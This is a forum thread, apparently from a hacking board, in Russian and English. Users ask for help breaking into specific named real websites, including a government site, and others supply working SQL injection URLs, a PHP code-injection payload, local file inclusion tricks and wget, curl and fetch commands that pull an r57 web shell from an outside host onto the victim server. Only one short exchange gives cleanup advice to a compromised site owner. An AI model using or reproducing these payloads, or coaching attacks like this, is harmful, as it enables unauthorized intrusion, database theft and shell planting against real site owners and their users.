Is this site inject able?

http://www.martinzaple.co.uk/gallery.php?id=17

Nothing works on it.

lightangel said:
Is this site inject able?
http://www.martinzaple.co.uk/gallery.php?id=17
Nothing works on it.


injectable

lightangel said:
Is this site inject able?
http://www.martinzaple.co.uk/gallery.php?id=17
Nothing works on it.


http://www.martinzaple.co.uk/gallery.php?id=-7+/*!union*/+select+1,(select+schema_name+from+information_sch ema.schemata),3,4,5,6,7--+

there "union" filter

Народ такой вопрос. Есть скуля msql 4.0.24-standart. Не выводит никак database().

делаю concat_ws(0x3a,user(),database(),version()) - вся информация есть кроме имени базы. Такое впечатление что для данного user() не в одну базу нет доступа? Линку скинуть пока не могу но хотелось бы разобраться почему такое получается? Может посоветуете чего? Заранее спасибо.

zenon3 said:
Такое впечатление что для данного user() не в одну базу нет доступа?


практически невозможно,

лучше скинь в пм, посмотрю

нашел php injection запрос вот такой

http://сайт/imp_sub.html?_c=${@print(md5(kasper))}&_m=publications&_t=rec&id=1403

в ответ получаю

67cb7dbdb935430911459f5431d61701Method {${@print(md5(kasper))}} in class [$this->rec] does not exists!

Кто подскажет каким методом раскрутить?

Kasper1898 said:
нашел php injection запрос вот такой
http://сайт/imp_sub.html?_c=${@print(md5(kasper))}&_m=publications&_t=rec&id=1403
в ответ получаю
67cb7dbdb935430911459f5431d61701Method {${@print(md5(kasper))}} in class [$this->rec] does not exists!
Кто подскажет каким методом раскрутить?


да что там раскручивать, лей шелл одним запросом, copy, file_put_contents, если системные фунцкии не отключены, то system + wget или system + curl, вобщем фантазируй.

а в след раз открой учебник по php, прежде чем задавать элементарные вопросы

Konqi said:
да что там раскручивать, лей шелл одним запросом, copy, file_put_contents, если системные фунцкии не отключены, то system + wget или system + curl, вобщем фантазируй.
а в след раз открой учебник по php, прежде чем задавать элементарные вопросы


я попробывал 3 варианта

wget http://www.shellhost.com/r57.txt -O 2.php

curl http://www.shellhost.com/r57.txt > 2.php

fetch http://www.shellhost.com/r57.txt; mv r57.txt 2.php

но не один из них не подошел

можешь помочь ?

Kasper1898 said:
у меня с php совсем плохо
можешь помочь довести начатое?а то я запрос криво составлю
буду ооооооочень благодарен,капец как хочу залить шелл


${copy('откуда','куда')}

${file_put_contents('куда вставить','что вставить')}

${system('wget http://шелл')} //закачает шелл в pwd

${system('curl http://шелл > /куда/записать/шелл')}

мануалы по фунцкиям найдешь на php.su

Konqi said:
${copy('откуда','куда')}
${file_put_contents('куда вставить','что вставить')}
${system('wget http://шелл')} //закачает шелл в pwd
${system('curl http://шелл > /куда/записать/шелл')}
мануалы по фунцкиям найдешь на php.su



перепробывал все,всеровно не получается

есть еще info.php

Configuration

PHP Core

Directive Local Value Master Value

allow_call_time_pass_reference On On

allow_url_fopen On On

always_populate_raw_post_data Off Off

arg_separator.input & &

arg_separator.output & &

asp_tags Off Off

auto_append_file no value no value

auto_prepend_file no value no value

browscap no value no value

default_charset no value no value

default_mimetype text/html text/html

define_syslog_variables Off Off

disable_classes no value no value

disable_functions no value no value

display_errors On On

display_startup_errors On On

doc_root no value no value

docref_ext no value no value

docref_root no value no value

enable_dl On On

error_append_string no value no value

error_log no value no value

error_prepend_string no value no value

error_reporting 2039 2039

expose_php On On

extension_dir /usr/local/lib/php/extensions/no-debug-non-zts-20020429 /usr/local/lib/php/extensions/no-debug-non-zts-20020429

file_uploads On On

gpc_order GPC GPC

highlight.bg #FFFFFF #FFFFFF

highlight.comment #FF8000 #FF8000

highlight.default #0000BB #0000BB

highlight.html #000000 #000000

highlight.keyword #007700 #007700

highlight.string #DD0000 #DD0000

html_errors On On

ignore_repeated_errors Off Off

ignore_repeated_source Off Off

ignore_user_abort Off Off

implicit_flush Off Off

include_path .:/usr/local/lib/php .:/usr/local/lib/php

log_errors On On

log_errors_max_len 1024 1024

magic_quotes_gpc Off Off

magic_quotes_runtime Off Off

magic_quotes_sybase Off Off

max_execution_time 30 30

max_input_time 60 60

open_basedir no value no value

output_buffering 4096 4096

output_handler no value no value

post_max_size 30M 30M

precision 14 14

register_argc_argv Off Off

register_globals On On

report_memleaks On On

safe_mode Off Off

safe_mode_exec_dir no value no value

safe_mode_gid Off Off

safe_mode_include_dir no value no value

sendmail_from me@localhost.com me@localhost.com

sendmail_path /usr/sbin/sendmail -t -i /usr/sbin/sendmail -t -i

serialize_precision 100 100

short_open_tag On On

SMTP localhost localhost

smtp_port 25 25

sql.safe_mode Off Off

track_errors Off Off

unserialize_callback_func no value no value

upload_max_filesize 20M 20M

upload_tmp_dir no value no value

user_dir no value no value

variables_order GPCS GPCS

xmlrpc_error_number 0 0

xmlrpc_errors Off Off

y2k_compliance On On

Kasper1898

из за ваших кривых рук мы не будем флудить тут до утра, почитайте учебники, никто не должен за вас что то сделать, здесь дают лишь советы.

реально ли взломать или убить сайт funfree.ru ?

не считая Дос и Ддос атаки

Wave said:
реально ли взломать или убить сайт funfree.ru ?
не считая Дос и Ддос атаки


это не форум киллеров, тут не убивают

а для взлома вам сюда /forum57.html (https://antichat.live/forums/57/)

Wave said:
реально ли взломать или убить сайт funfree.ru ?
не считая Дос и Ддос атаки


реально.


Опасный сайт
Посещение этой страницы может представлять опасность. Страница была замечена в распространении вредоносного программного обеспечения.
Opera Software настоятельно не рекомендует посещать эту страницу.

это не форум киллеров, тут не убивают
а для взлома вам сюда /forum57.html


Тогда я пишу правильно )

Это мой сайт... так что вреда ему я никак не желаю

а вот узнать сможет ли мне кто либо навредить - хотелось бы знать

Опасный сайт
Посещение этой страницы может представлять опасность. Страница была замечена в распространении вредоносного программного обеспечения.
Opera Software настоятельно не рекомендует посещать эту страницу.


Это так на него опера ругается ?

из-за чего... там ничего плохого нету

Wave said:
Тогда я пишу правильно )
Это мой сайт... так что вреда ему я никак не желаю
а вот узнать сможет ли мне кто либо навредить - хотелось бы знать


тогда вам сюда /forum110.html (https://antichat.live/forums/110/)


Это так на него опера ругается ?
из-за чего... там ничего плохого нету


спросите яндексу, оно в блеклисте яндекса, по "Malware Warning"

Яндекс ругается из-за комментов что оставляют на сайте

там было и возможно еще есть спам

Wave said:
Яндекс ругается из-за комментов что оставляют на сайте
там было и возможно еще есть спам


у тебя или стоит, или стоял фрейм или ещё какая херня, через которую распространялся троян. Домен, откуда распространялся трой попал в блек яши, потом за ним и твой сайт попал к нему в блек, через некоторое время (пол часа-час) твой сайт попал в блэк у оперы. После того, как ты закроешь дырки на сайте, убьёшь шеллы, сменишь пароли (чтобы те по новой не поставили фрейм) пройдёт ещё около двух суток прежде чем сайт твой выйдет из блэков. Даже, если в текущий момент в коде страниц ты не можешь найти такого фрейма, то это не значит, что как только вылезешь из блэка, его не поставят снова (те кто твой сайт ломанули).

Яша на спам на сайте не ругается таким образом.

http://www.nwri.gov.ng/about/board_Detail.asp?id=52+order+by+14(error)

http://www.nwri.gov.ng/about/board_Detail.asp?id=52+order+by+13(no error)

But union select is not working and "user" table is available.

lightangel said:
http://www.nwri.gov.ng/about/board_Detail.asp?id=52+order+by+14(error)
http://www.nwri.gov.ng/about/board_Detail.asp?id=52+order+by+13(no error)
But union select is not working and "user" table is available.


http://www.nwri.gov.ng/about/board_Detail.asp?id=52+and+0+union+select+1,2,3,4, 5,6,7,8,9,10,11,12,13+from+msysaccessobjects

read some manuals =\

lightangel said:
http://www.nwri.gov.ng/about/board_Detail.asp?id=52+order+by+14(error)
http://www.nwri.gov.ng/about/board_Detail.asp?id=52+order+by+13(no error)
But union select is not working and "user" table is available.


This is MsAccess

Injects


Code:
_ttp://www.nwri.gov.ng/about/board_Detail.asp?id=52+and+1=2+union+select+1,2,3, 4,5,6,7,8,9,10,11,12,13+from+clients

_ttp://www.nwri.gov.ng/about/board_Detail.asp?id=52+and+1=2+union+select+1,2,3, 4,5,6,7,8,9,10,11,12,13+from+clients.clin

_ttp://www.nwri.gov.ng/about/board_Detail.asp?id=52+and+(select+count(name)+fro m+clients)>0+and+1=1

Datas


Code:
path = c:\windows\system32\inetsrv\
Table = Clients
Fields = id, name, etc...

Thank you so much, noted that.

есть LRI вида http://www.svaltera.ua/index.php?inc=../../../../../../../../proc/self/fd/2

можно как то использовать ?

допустим я нашел путь в файлу phpinfo , как он мне чем то может помочь?

sl1k said:
есть LRI вида http://www.svaltera.ua/index.php?inc=../../../../../../../../proc/self/fd/2
можно как то использовать ?


попробуй

/proc/self/envirion если есть то процентов 50

получиться шелл закинуть

vasykas said:
попробуй
/proc/self/envirion если есть то процентов 50
получиться шелл закинуть


envirion,log недоступно, может есть еще какие то методы ?

sl1k said:
envirion,log недоступно, может есть еще какие то методы ?


Не доступно? или идет фильтрация?

aydin-ka said:
Не доступно? или идет фильтрация?


log доступен но пишет

Fatal error: Allowed memory size of 8388608 bytes exhausted (tried to allocate 4980736 bytes) in /usr/local/apache/logs/error_log on line 39816

(типа не хватает памяти ? )

envirion просто молчит

sl1k said:
log доступен но пишет
Fatal error: Allowed memory size of 8388608 bytes exhausted (tried to allocate 4980736 bytes) in /usr/local/apache/logs/error_log on line 39816
(типа не хватает памяти ? )
envirion просто молчит


Да памяти не хватает. а на счет envirion попробуй нулл-байт %00

нулл бит тут причем? , написано же "Permission denied"

нет прав на чтение

а ошибка с "Fatal error: Allowed memory size...." связано с тем что для обработки файла требуется больше той памяти которое разрешено использовать пыху (нехватка памяти)

Доброго времени суток..Собственно я новичок на этом форуме, и хотел спросить как вы делаете (базы где вы их берете) особено логин пароль для чекера хотелось ето узнать если можно то дайте сылку чтоб почитать и какие нужны програмы для етова...

Lezvie said:
Доброго времени суток..Собственно я новичок на этом форуме, и хотел спросить как вы делаете (базы где вы их берете) особено логин пароль для чекера хотелось ето узнать если можно то дайте сылку чтоб почитать и какие нужны програмы для етова...


/thread43966-SQL+%C8%ED%FA%E5%EA%F6%E8%E8.html

Кручу скуль, подобрал кол-во полей, но вот запрос сикьюэл не режется значками комментов:


Code:
Error in query: SELECT * FROM articles,tree WHERE articles.tid=288 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 -- AND articles.tid=tree.tid AND tshow='1' AND `tstamp` LIKE '2011%' ORDER BY aid DESC. The used SELECT statements have a different number of columns

Как быть?

shadowrun said:
Кручу скуль, подобрал кол-во полей, но вот запрос сикьюэл не режется значками комментов:

Code:
Error in query: SELECT * FROM articles,tree WHERE articles.tid=288 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 -- AND articles.tid=tree.tid AND tshow='1' AND `tstamp` LIKE '2011%' ORDER BY aid DESC. The used SELECT statements have a different number of columns

Как быть?



The used SELECT statements have a different number of columns

Просто колонок не столько

попугай said:
The used SELECT statements have a different number of columns
Просто колонок не столько


Колонок столько. Это сообщение выводиться в теле сайта, который загрузился (с контентом). А когда число колонок не подходит, сайт не загружается а только эррор маскуеля (на белом фоне черный текст ошибки).

Is this really vulnerable?


Code:
http://www.gomlab.com/eng/forum.html?mode=announceView&a=125%27&no=

I've tried all attempts on it.

shadowrun said:
Колонок столько. Это сообщение выводиться в теле сайта, который загрузился (с контентом). А когда число колонок не подходит, сайт не загружается а только эррор маскуеля (на белом фоне черный текст ошибки).


Там несколько последующих запросов просто.

Выводи в ошибке, или же ищи вывод первого запроса.

lightangel said:
Is this really vulnerable?

Code:
http://www.gomlab.com/eng/forum.html?mode=announceView&a=125%27&no=

I've tried all attempts on it.




Code:
http://www.gomlab.com/eng/forum.html?mode=announceView&no=&a=125+and+1=1 TRUE

http://www.gomlab.com/eng/forum.html?mode=announceView&no=&a=125+and+1=2 FALSE

Yes, this is vulnerable

Sure. Well the problem is, I can't get order by or group by.

Can you just help a bit further?

lightangel said:
Sure. Well the problem is, I can't get order by or group by.
Can you just help a bit further?


Yes, we can help if you write the url, where you "can't get order by or group by"

Thanks sir.


Code:
http://www.gomlab.com/eng/forum.html?mode=announceView&no=&a=125+and+1=1 TRUE

http://www.gomlab.com/eng/forum.html?mode=announceView&no=&a=125+and+1=2 FALSE

I tried http://www.gomlab.com/eng/forum.html?mode=announceView&no=&a=125+and+1=1(order by and string based= nothing works)

http://www.gomlab.com/eng/forum.html?mode=announceView&no=&a=125+and+1=2 FALSE(order by and string based= nothing works)

Any help now? Thanks.

lightangel said:
Thanks sir.

Code:
http://www.gomlab.com/eng/forum.html?mode=announceView&no=&a=125+and+1=1 TRUE

http://www.gomlab.com/eng/forum.html?mode=announceView&no=&a=125+and+1=2 FALSE

I tried http://www.gomlab.com/eng/forum.html?mode=announceView&no=&a=125+and+1=1(order by and string based= nothing works)
http://www.gomlab.com/eng/forum.html?mode=announceView&no=&a=125+and+1=2 FALSE(order by and string based= nothing works)
Any help now? Thanks.



SQL-Injection in PostgreSQL DB (https://antichat.live/threads/35599/)

Part 2 (https://antichat.live/threads/35599/page-2/)

Well received, thank you.

подскажите, вот есть запрос:


+union+select+1,table_name,3+from+information_sche ma.tables


показывает имена всех таблиц.

такой запрос:


+union+select+1,table_schema,3+from+information_sc hema.tables+where+table_name=0x0000


покажет имена баз данных в которых есть таблица с именем 0х0000?

ок, например после последнего запроса вывелось несколько имён баз данных. как получить имена таблиц из каждой по отдельности?

Goodwin_ said:
подскажите, вот есть запрос:
показывает имена всех таблиц.
такой запрос:
покажет имена баз данных в которых есть таблица с именем 0х0000?
ок, например после последнего запроса вывелось несколько имён баз данных. как получить имена таблиц из каждой по отдельности?



where table name='имя таблицы' and table_schema='имя_базы'

пора уже взятся за учебник SQL..